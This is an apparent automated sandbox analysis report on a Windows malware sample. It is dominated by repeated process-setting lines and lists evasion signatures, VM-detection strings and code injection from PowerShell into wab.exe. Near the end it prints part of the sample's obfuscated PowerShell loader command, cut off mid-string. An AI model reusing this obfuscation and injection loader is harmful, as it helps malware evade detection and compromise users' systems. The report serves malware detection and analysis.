Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6058 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3802 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6963 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2707 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 4482 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 3748 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720 Thread sleep count: 6963 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 368 Thread sleep count: 2707 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3648 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4616 Thread sleep count: 4482 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 892 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 4482 delay: -5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 60000 Jump to behavior
Source: powershell.exe, 00000002.00000002.2713252322.000001A0E2EA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWe)%SystemRoot%\system32\mswsock.dllllodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes
Source: wscript.exe, 00000001.00000002.2071021377.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2069612519.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041244405.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041007560.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: wscript.exe, 00000001.00000002.2070838707.000002293C045000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9bxk
Source: wscript.exe, 00000001.00000002.2070838707.000002293C034000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000001.00000002.2071233664.000002293C12A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2071021377.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2069612519.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041244405.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041492906.000002293C12A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041007560.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2560315614.00000000054A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3336499423.0000000005448000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3336499423.00000000054A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0354D434 LdrInitializeThunk, 5_2_0354D434

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A00000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 27BFB08 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi 